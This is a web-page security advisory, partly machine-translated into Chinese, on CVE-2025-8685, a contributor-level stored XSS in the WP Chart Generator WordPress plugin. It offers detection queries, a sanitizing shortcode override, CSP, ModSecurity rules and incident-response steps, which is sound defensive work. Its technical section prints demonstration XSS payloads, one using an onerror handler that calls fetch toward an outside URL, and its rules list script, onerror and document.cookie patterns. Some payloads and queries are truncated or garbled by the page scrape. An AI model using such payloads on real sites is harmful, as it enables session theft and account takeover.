| 插件名稱 | Wp 圖表生成器 |
|---|---|
| 漏洞類型 | 認證的儲存型 XSS |
| CVE 編號 | CVE-2025-8685 |
| 緊急程度 | 低 |
| CVE 發布日期 | 2025-08-11 |
| 來源 URL | CVE-2025-8685 |
漏洞通告:WP 圖表生成器 (≤ 1.0.4) — 經過身份驗證的貢獻者透過 [wpchart] 短代碼存儲 XSS (CVE‑2025‑8685)
執行摘要
本通告描述了“WP 圖表生成器”WordPress 插件(版本 ≤ 1.0.4)中的存儲跨站腳本(XSS)漏洞,追蹤編號為 CVE‑2025‑8685。擁有貢獻者權限(或更高)的經過身份驗證用戶可以通過插件的 [wpchart] 短代碼存儲惡意有效載荷。由於有效載荷是持久的,查看受影響頁面的訪問者可能會在其瀏覽器中執行攻擊者控制的 JavaScript。.
在報告的披露中,嚴重性被認為是低至中等(CVSS 向量 ~6.5),因為利用需要經過身份驗證的貢獻者帳戶。發佈時沒有官方供應商修補程序。本通告提供技術細節、檢測方法、短期緩解選項、開發者修復指導、WAF/ModSecurity 規則示例,以及來自經驗豐富的香港安全從業者的事件響應檢查表。.
什麼是漏洞?
- 受影響的軟件:WP 圖表生成器插件
- 受影響的版本:≤ 1.0.4
- 漏洞類型:在 [wpchart] 短代碼渲染中的存儲跨站腳本(XSS)
- 所需權限:貢獻者(或更高)
- 發佈日期:2025年8月11日
- CVE:CVE‑2025‑8685
- 官方修復:發佈時無
該插件直接將不受信任的短代碼屬性和/或內部內容渲染到前端 HTML/JS 中,而未正確進行清理和轉義。貢獻者可以創建包含腳本片段或事件處理程序的精心設計的 [wpchart] 短代碼內容。渲染時,瀏覽器在網站的來源中執行注入的 JavaScript。.
為什麼這很重要(影響分析)
即使初始訪問需要低權限,存儲 XSS 仍然是高風險的。主要影響:
- 每次訪問者查看頁面時,持久有效載荷都會執行,擴大了暴露範圍。.
- 執行的 JavaScript 以頁面來源的權限運行:它可以嘗試竊取 cookies(如果不是 HttpOnly)、代表登錄用戶執行操作、顯示釣魚 UI 或重定向訪問者,並加載進一步的惡意資源(利用鏈、加載器、加密貨幣挖礦器)。.
- 許多網站允許貢獻者帳戶(例如,多作者博客、會員網站),因此攻擊者可以獲得或創建這樣的帳戶。.
- 編輯/管理員帳戶在登入狀態下查看前端內容會增加特權提升或帳戶接管的風險。.
漏洞的外觀 — 高層次技術步驟
該插件註冊了一個 [wpchart] 接受屬性(標籤、標題、數據數組、顏色)的短代碼。當這些屬性嵌入到HTML或內聯JavaScript中而未進行上下文感知的轉義時,就會產生漏洞。.
- 攻擊者獲得或創建一個貢獻者帳戶。.
- 他們添加一個包含精心製作的
[wpchart]短代碼,該短代碼具有屬性或內部內容,包含腳本片段或事件處理程序。. - 負載被存儲在數據庫中。當頁面被提供時,瀏覽器解析注入的標記或腳本並執行它。.
- 任何訪問者(包括已登入的編輯/管理員)都可以觸發該負載。.
示範負載(請勿在公共網站上部署):
[wpchart title=""]</code></pre>
<pre><code>[wpchart data='[{"label":"<img src="x" onerror="fetch(\"https:>","value":10}]']</code></pre>
<p>根本原因是在HTML/JS上下文中渲染不受信任的輸入而未進行轉義或驗證。.</p>
</section>
<section>
<h2 id="exploitation-scenarios-and-who-is-at-risk">利用場景及誰面臨風險</h2>
<ul>
<li>允許貢獻者創建內容的網站(會員或多作者網站)。.</li>
<li>具有社交註冊、大量導入的作者或弱帳戶控制的網站。.</li>
<li>編輯/管理員在身份驗證後預覽或查看前端內容的網站。.</li>
<li>公共訪客和客戶可能會受到影響(隱私和聲譽損害)。.</li>
<li>商業網站特別敏感,因為可能會篡改結帳流程。.</li>
</ul>
</section>
<section>
<h2 id="detection-how-to-find-vulnerable-or-exploited-instances">偵測 — 如何找到易受攻擊或已被利用的實例</h2>
<p>搜尋文章、頁面和元資料以 <code>[wpchart]</code> 實例和類似腳本的片段。.</p>
<h3 id="wp-cli">WP-CLI</h3>
<pre><code># 搜尋文章和頁面中的 'wpchart'
</code></pre>
<h3 id="sql">SQL</h3>
<pre><code>-- 在 post_content 中搜尋 wpchart 短碼;
</code></pre>
<p>尋找可疑的標記: <code><script</code>, <code>onerror=</code>, <code>onload=</code>, <code>javascript:</code>, <code>document.cookie</code>, <code>fetch(</code>, ,以及編碼的等價物(例如,, <code><script></code>, <code>%3Cscript%3E</code>).</p>
<pre><code>SELECT ID, post_title, post_content<script|onerror=|javascript:|document.cookie|fetch\\()';
</code></pre>
<p>Also search postmeta and plugin options where chart configurations may be stored:</p>
<pre><code>SELECT post_id, meta_key, meta_value
FROM wp_postmeta
WHERE meta_value LIKE '%wpchart%'
OR meta_value REGEXP '(?i)(<script|onerror=|javascript:|document.cookie|fetch\\()';
</code></pre>
<p>Examine webserver logs for POSTs creating/updating content and for outbound requests to suspicious domains originating from page views.</p>
</section>
<section>
<h2 id="short-term-mitigations-site-owners-and-admins">Short-term mitigations (site owners and admins)</h2>
<p>If an immediate vendor patch is unavailable, take the following actions to reduce exposure:</p>
<ol>
<li><strong>Remove or deactivate the plugin (preferred):</strong> If chart functionality is not required immediately, deactivate and remove the plugin until fixed.</li>
<li><strong>Restrict Contributor accounts:</strong> Temporarily disable new registrations or change default role to Subscriber. Review contributors and suspend or reset passwords for suspicious accounts.</li>
<li><strong>Review content and remove malicious shortcodes:</strong> Search posts/pages and sanitize or remove any <code>[wpchart]</code> occurrences that include script-like patterns.</li>
<li><strong>Temporary server-side sanitizer (virtual patch):</strong> Override the shortcode with a safe handler to sanitize attributes and content. Example mu-plugin snippet:</li>
</ol>
<pre><code><?php
// mu-plugin/wpchart-sanitizer.php
if ( ! function_exists( 'wpchart_sanitized_handler' ) ) {
function wpchart_sanitized_handler( $atts = [], $content = '' ) {
// Basic attribute sanitization example
$atts = array_map( 'sanitize_text_field', (array) $atts );
// whitelist numeric attributes
if ( isset( $atts['width'] ) ) {
$atts['width'] = intval( $atts['width'] );
}
if ( isset( $atts['height'] ) ) {
$atts['height'] = intval( $atts['height'] );
}
// sanitize content using a safe allowlist
$content = wp_kses( $content, array(
'a' => array( 'href' => true, 'title' => true ),
'span' => array( 'class' => true ),
) );
// Build safe output (example: escaped)
$title = isset( $atts['title'] ) ? esc_html( $atts['title'] ) : '';
return '<div class="wpchart-safe" data-config="' . esc_attr( json_encode( $atts ) ) . '">' . $title . $content . '</div>';
}
// Remove original shortcode if registered and register safe handler
remove_shortcode( 'wpchart' );
add_shortcode( 'wpchart', 'wpchart_sanitized_handler' );
}
?>
</code></pre>
<p>Notes: place this as an mu-plugin so it loads early. This is a temporary mitigation to neutralize stored payloads before rendering.</p>
<ol start="5">
<li><strong>Harden browser-side controls:</strong> Implement a Content Security Policy (CSP) that blocks inline scripts and restricts script sources. Example header:
<pre><code>Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.example.com; object-src 'none'; base-uri 'self'; frame-ancestors 'none'</code></pre>
<p> Also ensure cookies use Secure and HttpOnly flags and consider SameSite settings.</li>
<li><strong>Deploy rule-based request filters:</strong> Use host-level or application-layer filters to block content submissions containing script-like payloads targeted at the <code>[wpchart]</code> shortcode (examples below).</li>
</ol>
</section>
<section>
<h2 id="waf-modsecurity-rules-examples">WAF / ModSecurity rules (examples)</h2>
<p>Below are example ModSecurity rules to block common XSS patterns related to <code>[wpchart]</code>. Test thoroughly before applying to production.</p>
<pre><code># ModSecurity example
SecRule REQUEST_URI|REQUEST_BODY "@rx \[wpchart[^\]]*(<script|onerror=|onload=|javascript:|document\.cookie|fetch\()" \
"id:1001001,phase:2,deny,log,status:403,msg:'Blocked stored XSS attempt in wpchart shortcode',severity:2"
</code></pre>
<pre><code>SecRule REQUEST_METHOD "^POST$" \
"chain, id:1001002,phase:2,deny,log,status:403,msg:'Blocked POST containing script tag',severity:2"
SecRule REQUEST_BODY "@rx <\s*script\b" "t:none"
</code></pre>
<pre><code>SecRule REQUEST_BODY "@rx \[wpchart[^\]]*(onerror|onload|javascript:|document\.cookie|window\.location)" \
"id:1001003,phase:2,deny,log,status:403,msg:'Blocked suspicious attribute inside wpchart',severity:2"
</code></pre>
<pre><code>SecRule REQUEST_URI "@rx /wp-admin/post.php|/wp-admin/post-new.php" \
"phase:2,id:1001004,deny,log,status:403,msg:'Blocked potential XSS payload in post content',chain"
SecRule REQUEST_BODY "@rx (onerror|onload|<\s*script|javascript:|document\.cookie|fetch\()" "t:none"
</code></pre>
<p>Guidance:</p>
<ul>
<li>Target rules narrowly (match the <code>[wpchart]</code> token and plugin-specific meta keys) to reduce false positives.</li>
<li>Log and run in monitor/report-only mode initially to tune rules, then switch to deny once confidence is established.</li>
<li>Combine with rate-limiting to mitigate repeated attempts.</li>
</ul>
</section>
<section>
<h2 id="recommended-permanent-code-fixes-for-plugin-developers">Recommended permanent code fixes for plugin developers</h2>
<p>Developers should address the root causes with robust validation and context-aware escaping:</p>
<ol>
<li><strong>Sanitize input on accept:</strong> Use typed validation for numeric fields (intval(), floatval()), use <code>sanitize_text_field()</code> for simple strings, and parse & validate JSON configuration server-side.</li>
<li><strong>Escape output per context:</strong> Use <code>esc_attr()</code> for attribute values, <code>esc_html()</code> for text nodes and <code>wp_kses()</code> with strict allowlists for any permitted HTML. Avoid echoing unchecked input into inline scripts.</li>
<li><strong>Prefer data-* attributes:</strong> Emit sanitized JSON inside a data attribute via <code>wp_json_encode()</code> and let a vetted client-side script consume that data safely.</li>
<li><strong>Enforce capability checks and nonces:</strong> For any AJAX endpoints or admin UI that stores content, enforce <code>current_user_can()</code> and <code>check_admin_referer()</code>.</li>
<li><strong>Example safe shortcode output pattern:</strong></li>
</ol>
<pre><code>function wpchart_safe_shortcode( $atts = [], $content = '' ) {
$atts = shortcode_atts( array(
'title' => '',
'width' => 600,
'height' => 400,
'data' => '[]',
), $atts, 'wpchart' );
// Sanitize / validate
$safe = array(
'title' => sanitize_text_field( $atts['title'] ),
'width' => intval( $atts['width'] ),
'height' => intval( $atts['height'] ),
);
// For JSON data: decode and validate structure; re-encode safely
$data = json_decode( wp_unslash( $atts['data'] ), true );
if ( ! is_array( $data ) ) {
$data = array();
}
// Validate each data point (example)
$validated_data = array();
foreach ( $data as $row ) {
$label = isset( $row['label'] ) ? sanitize_text_field( $row['label'] ) : '';
$value = isset( $row['value'] ) ? floatval( $row['value'] ) : 0;
$validated_data[] = array( 'label' => $label, 'value' => $value );
}
// Output: store config safely in data attribute and escape it for HTML
$cfg = wp_json_encode( array(
'title' => $safe['title'],
'width' => $safe['width'],
'height'=> $safe['height'],
'data' => $validated_data,
) );
return sprintf(
'<div class="wpchart" data-wpchart="%s"></div>',
esc_attr( $cfg )
);
}
</code></pre>
<p>Do not build inline scripts that interpolate user-provided values. Use external, audited JS that reads sanitized <code>data-*</code> attributes.</p>
</section>
<section>
<h2 id="incident-response-if-you-suspect-exploitation">Incident response: If you suspect exploitation</h2>
<ol>
<li>Take affected page(s) offline (unpublish) or put the site into maintenance mode if widespread.</li>
<li>Identify and remove malicious posts, shortcodes or plugin meta entries (see detection section).</li>
<li>Change passwords for Contributor+ accounts and administrators. Consider forcing password resets for all users if compromise is suspected.</li>
<li>Inspect server logs for suspicious activity and block attacker IPs at host or WAF level.</li>
<li>Run a full malware scan and file integrity check. Look for added admin users, unexpected scheduled tasks, or backdoors.</li>
<li>Rotate API keys, integration tokens, and any stored credentials that could be exposed.</li>
<li>If admin accounts were compromised, audit site settings and restore from a known-clean backup if necessary.</li>
<li>Notify affected users if user data may have been exposed, following applicable privacy and breach-notification law.</li>
<li>After cleanup, re-enable stricter registration policies, enforce two-factor authentication for elevated roles, apply CSP and secure HTTP headers.</li>
<li>Monitor for re-injection attempts and maintain long-term detection rules.</li>
</ol>
</section>
<section>
<h2 id="monitoring-and-detection-after-cleanup">Monitoring and detection after cleanup</h2>
<ul>
<li>Enable logging for request filters and review blocked events.</li>
<li>Set up content integrity checks to detect reappearance of suspicious <code>[wpchart]</code> shortcodes or injected script tags.</li>
<li>Schedule weekly scans and manual reviews for a period after the incident.</li>
<li>Deploy updates in a staging environment and validate fixes before production rollout.</li>
</ul>
</section>
<section>
<h2 id="hardening-recommendations-to-reduce-xss-risk-site-wide">Hardening recommendations to reduce XSS risk site-wide</h2>
<ul>
<li>Apply principle of least privilege: limit Contributor role usage and consider custom roles with reduced capabilities.</li>
<li>Require editorial review workflows: contributors should submit for review rather than publish directly.</li>
<li>Enforce strong passwords and two-factor authentication for editors and administrators.</li>
<li>Restrict untrusted user registration or require administrator approval.</li>
<li>Use CSP in report-only mode first to identify issues, then enforce once safe.</li>
<li>Ensure session cookies are HttpOnly and Secure; consider SameSite settings.</li>
<li>Keep WordPress core and plugins updated and perform periodic security audits.</li>
</ul>
</section>
<section>
<h2 id="a-short-note-for-developers-test-for-xss-during-qa">A short note for developers: test for XSS during QA</h2>
<ul>
<li>Include input fuzzing for shortcode attributes and stored values.</li>
<li>Automate tests to detect unescaped outputs in HTML and JS contexts.</li>
<li>Review third-party chart libraries and ensure data is passed safely (prefer data-* + JSON + validated client-side rendering).</li>
<li>Maintain a clear disclosure policy and a public changelog to accelerate coordinated fixes when issues are reported.</li>
</ul>
</section>
<section>
<h2 id="frequently-asked-questions-faq">Frequently asked questions (FAQ)</h2>
<h3 id="q-if-i-am-not-using-the-wp-chart-generator-plugin-am-i-affected">Q: If I am not using the WP Chart Generator plugin, am I affected?</h3>
<p>No. This advisory concerns specifically the WP Chart Generator plugin (≤ 1.0.4). However, the general guidance applies to any plugin that renders unescaped user input.</p>
<h3 id="q-if-an-attacker-needs-a-contributor-account-is-my-site-safe">Q: If an attacker needs a Contributor account, is my site safe?</h3>
<p>Not necessarily. Many sites allow registrations that map to low-privilege roles; weak or reused passwords are a common vector. Treat user registration as a potential risk and limit privileges where possible.</p>
<h3 id="q-will-a-content-security-policy-fully-prevent-exploitation">Q: Will a Content Security Policy fully prevent exploitation?</h3>
<p>A properly configured CSP substantially reduces the impact of many XSS payloads by blocking inline scripts and restricting script origins, but CSP should complement input sanitization and server-side protections — it is not a substitute for correct coding.</p>
<h3 id="q-is-the-issue-already-patched">Q: Is the issue already patched?</h3>
<p>At the time of this advisory, no official patched release was available. Follow the plugin's release channel for updates and apply the mitigations listed here until a patch is published.</p>
</section>
<section>
<h2 id="closing-thoughts">Closing thoughts</h2>
<p>Stored XSS like CVE‑2025‑8685 can have persistent and far-reaching consequences. Although exploitation requires authenticated access, many realistic paths exist to obtain contributor-level permissions. Treat unescaped shortcode attributes and plugin-rendered client-side scripts as high priority. Immediate actions: review and sanitize content, restrict Contributor capabilities, apply temporary sanitization or request-filtering, and consider deactivating the plugin until it is fixed. Plugin authors should implement strict input validation and context-aware escaping for all shortcode attributes and stored content.</p>
<p>If you lack in-house capability to perform scans or apply mitigations, engage a trusted security practitioner or managed service to assist with detection, virtual patching and recovery steps. Maintain careful logs of remediation actions and preserve forensic artifacts if a compromise is suspected.</p>
<p style="margin-top:12px;">Stay vigilant. Review user-generated content regularly and reduce the blast radius of low-privilege user accounts.</p>
</section>
<footer style="margin-top:28px;color:#666;font-size:0.95em;">
<p>Prepared by a Hong Kong security expert. CVE record: <a href="https://www.cve.org/CVERecord/SearchResults?query=CVE-2025-8685" target="_blank" rel="noopener noreferrer">CVE-2025-8685</a>.</p>
</footer>
<p></body><br />
</html></p>
</div>
<section class="post-tags"><ul><li><h5 class="title-tags">標籤:</h5></li><li><a href="https://wp-security.org/zh/tag/wordpress-security/" rel="tag">WordPress Security</a></li></ul></section> <div class="pk-share-buttons-wrap pk-share-buttons-layout-default pk-share-buttons-scheme-bold-bg pk-share-buttons-has-counts pk-share-buttons-has-total-counts pk-share-buttons-after-post pk-share-buttons-mode-php pk-share-buttons-mode-rest" data-post-id="803" data-share-url="https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" >
<div class="pk-share-buttons-total pk-share-buttons-total-no-count">
<div class="pk-share-buttons-count cs-font-primary">0 Shares:</div>
</div>
<div class="pk-share-buttons-items">
<div class="pk-share-buttons-item pk-share-buttons-facebook pk-share-buttons-no-count" data-id="facebook">
<a href="https://www.facebook.com/sharer.php?u=https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-facebook"></i>
<span class="pk-share-buttons-label pk-font-primary">分享</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
<div class="pk-share-buttons-item pk-share-buttons-twitter pk-share-buttons-no-count" data-id="twitter">
<a href="https://x.com/share?&text=%3Ctrp-post-container%20data-trp-post-id%3D%27803%27%3EHong%20Kong%20Security%20NGO%20warns%20WordPress%20XSS%28CVE20258685%29%3C%2Ftrp-post-container%3E&url=https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-twitter"></i>
<span class="pk-share-buttons-label pk-font-primary">推文</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
<div class="pk-share-buttons-item pk-share-buttons-pinterest pk-share-buttons-no-count" data-id="pinterest">
<a href="https://pinterest.com/pin/create/bookmarklet/?url=https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/&media=https://wp-security.org/wp-content/uploads/2025/08/2025-08-11CVE20258685Wp-chart-generator-1024x576.jpg" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-pinterest"></i>
<span class="pk-share-buttons-label pk-font-primary">固定</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
</div>
</div>
<section class="post-author">
<div class="authors-compact">
<div class="author-wrap">
<div class="author">
<div class="author-avatar">
<a href="https://wp-security.org/zh/author/wp-security/" rel="author">
<img alt='' src='https://secure.gravatar.com/avatar/16bf83a02c7c3aa39247769e866366c2ea8ccfb8bd88a16ef3ac35925a1da888?s=120&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/16bf83a02c7c3aa39247769e866366c2ea8ccfb8bd88a16ef3ac35925a1da888?s=240&d=mm&r=g 2x' class='avatar avatar-120 photo' height='120' width='120' decoding='async'/> </a>
</div>
<div class="author-description">
<h5 class="title-author">
<span class="fn">
<a href="https://wp-security.org/zh/author/wp-security/" rel="author">
WP Security Vulnerability Report </a>
</span>
</h5>
<p class="note"></p>
</div>
</div>
</div>
</div>
</section>
<div id="disqus_thread"></div>
</div>
</div>
</article>
<div class="post-prev-next">
<a class="link-item prev-link" href="https://wp-security.org/zh/vulnerability-database/gmap-venturit-stored-xss-alert-for-hkcve20258568/">
<div class="link-content">
<div class="link-label">
<span class="link-arrow"></span><span class="link-text"> — 之前的文章</span>
</div>
<h2 class="entry-title">
GMap Venturit Stored XSS Alert for HK(CVE20258568) </h2>
</div>
</a>
<a class="link-item next-link" href="https://wp-security.org/zh/vulnerability-database/hong-kong-security-wordpress-stock-quotes-xsscve20258688/">
<div class="link-content">
<div class="link-label">
<span class="link-text">下一篇文章 — </span><span class="link-arrow"></span>
</div>
<h2 class="entry-title">
Hong Kong Security WordPress Stock Quotes XSS(CVE20258688) </h2>
</div>
</a>
</div>
<section class="post-archive archive-related">
<div class="archive-wrap">
<div class="title-block-wrap">
<h5 class="title-block">
你可能也喜歡 </h5>
</div>
<div class="archive-main archive-list archive-heading-small archive-borders-enabled archive-shadow-enabled archive-scale-enabled">
<article class="entry-without-preview post-1836 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/hk-security-advisory-modula-image-gallery-vulnerabilitycve202513646/" rel="bookmark">HK Security Advisory Modula Image Gallery Vulnerability(CVE202513646)</a></h2><ul class="post-meta"><li class="meta-date">12 月 3, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Arbitrary File Upload in WordPress Modula Image Gallery Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-933 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-alerts-wordpress-xsscve20253414/" rel="bookmark">Hong Kong Security NGO alerts WordPress XSS(CVE20253414)</a></h2><ul class="post-meta"><li class="meta-date">8 月 14, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress Structured Content plugin < 1.7.0 - Contributor Stored XSS vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-1614 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/community-alert-learnpress-unauthenticated-database-accesscve202511372/" rel="bookmark">Community Alert LearnPress Unauthenticated Database Access(CVE202511372)</a></h2><ul class="post-meta"><li class="meta-date">10 月 18, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress LearnPress – WordPress LMS Plugin plugin <= 4.2.9.3 - Missing Authorization to Unauthenticated Database Table Manipulation vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-1740 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/security-advisory-royal-elementor-addons-xsscve20255092/" rel="bookmark">Security Advisory Royal Elementor Addons XSS(CVE20255092)</a></h2><ul class="post-meta"><li class="meta-date">11 月 20, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Cross Site Scripting (XSS) in WordPress Royal Elementor Addons Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-1344 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/security-advisory-cloriato-lite-data-exposurecve202559003/" rel="bookmark">Security Advisory Cloriato Lite Data Exposure(CVE202559003)</a></h2><ul class="post-meta"><li class="meta-date">9 月 14, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress Cloriato Lite Theme <= 1.7.2 - Sensitive Data Exposure Vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-1360 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/community-security-alert-wordpress-employee-spotlight-xsscve202558915/" rel="bookmark">Community Security Alert WordPress Employee Spotlight XSS(CVE202558915)</a></h2><ul class="post-meta"><li class="meta-date">9 月 23, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress Employee Spotlight plugin <= 5.1.0 - Cross Site Scripting (XSS) vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
</div>
</div>
</section>
</main>
</div><!-- .content-area -->
</div><!-- .main-content -->
</div><!-- .cs-container -->
</div><!-- .site-content -->
<footer id="colophon" class="site-footer">
<div class="footer-subscribe">
<div class="cs-container">
<div class="subscribe-wrap">
</div>
</div>
</div>
<div class="footer-info">
<div class="cs-container">
<div class="site-info">
<div class="footer-col-info">
<span class="site-title footer-title" href="https://wp-security.org/zh/" rel="home">
<img src="https://wp-security.org/wp-content/uploads/2025/08/WP-Security-logo-1-e1754494371106.png" alt="WP Security" > </span>
<div class="footer-copyright">
© 2025 WP-Security.org Disclaimer: WP-Security.org is an independent, non-profit NGO community committed to sharing WordPress security news and information. We are not affiliated with WordPress, its parent company, or any related entities. All trademarks are the property of their respective owners. </div>
</div>
</div>
</div>
</div>
</footer>
</div>
</div><!-- .site-inner -->
</div><!-- .site -->
<template id="tp-language" data-tp-language="zh_HK"></template><script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/zh/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/squaretype/*","/zh/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<a href="#top" class="pk-scroll-to-top">
<i class="pk-icon pk-icon-up"></i>
</a>
<div class="pk-mobile-share-overlay">
</div>
<script type="text/javascript">
var _paq = _paq || [];
_paq.push(['setCustomDimension', 1, '{"ID":3,"name":"WP Security Vulnerability Report","avatar":"f7de7e299d4a4b4c92c6f2c2a29a7ca7"}']);
_paq.push(['trackPageView']);
(function () {
var u = "https://analytics2.wpmudev.com/";
_paq.push(['setTrackerUrl', u + 'track/']);
_paq.push(['setSiteId', '24942']);
var d = document, g = d.createElement('script'), s = d.getElementsByTagName('script')[0];
g.type = 'text/javascript';
g.async = true;
g.defer = true;
g.src = 'https://analytics.wpmucdn.com/matomo.js';
s.parentNode.insertBefore(g, s);
})();
</script>
<script type="importmap" id="wp-importmap">
{"imports":{"@wordpress/interactivity":"https://wp-security.org/wp-includes/js/dist/script-modules/interactivity/index.min.js?ver=8964710565a1d258501f","@surecart/checkout":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout/index.js?ver=817605f320f77b6291ef","@surecart/checkout-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout-events/index.js?ver=ed9647bd6c7865efe2ad","@surecart/checkout-service":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout-actions/index.js?ver=1999ef06f8f53c7492e5","@surecart/google-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/google/index.js?ver=d92e383a18bcf54ea538","@surecart/facebook-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/facebook/index.js?ver=cf5c6499cb7b867894c1","@surecart/a11y":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/a11y/index.js?ver=fbe783039308da940df7","@surecart/api-fetch":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/fetch/index.js?ver=1bfba8ea0694a193022a"}}
</script>
<script type="module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/line-item-note/index.js?ver=af6cf14267b5a9ad219f" id="@surecart/line-item-note-js-module"></script>
<script type="module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout/index.js?ver=817605f320f77b6291ef" id="@surecart/checkout-js-module"></script>
<script type="module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/cart/index.js?ver=c6810ec9f683d794994f" id="@surecart/cart-js-module"></script>
<script type="application/json" id="wp-script-module-data-@wordpress/interactivity">
{"state":{"surecart/checkout":{"checkout":{"line_items":{"data":[]}},"discountIsRedeemable":false,"isDiscountApplied":false,"itemsCount":0,"hasItems":false}}}
</script>
<div id="fb-root"></div>
<script async defer crossorigin="anonymous" src="https://connect.facebook.net/zh_HK/sdk.js#xfbml=1&version=v17.0&appId=&autoLogAppEvents=1" nonce="Ci8te34e"></script>
<script>
window.scFetchData =
{"root_url":"https:\/\/wp-security.org\/zh\/wp-json\/","nonce":"64c71c308e","nonce_endpoint":"https:\/\/wp-security.org\/wp-admin\/admin-ajax.php?action=sc-rest-nonce"} </script>
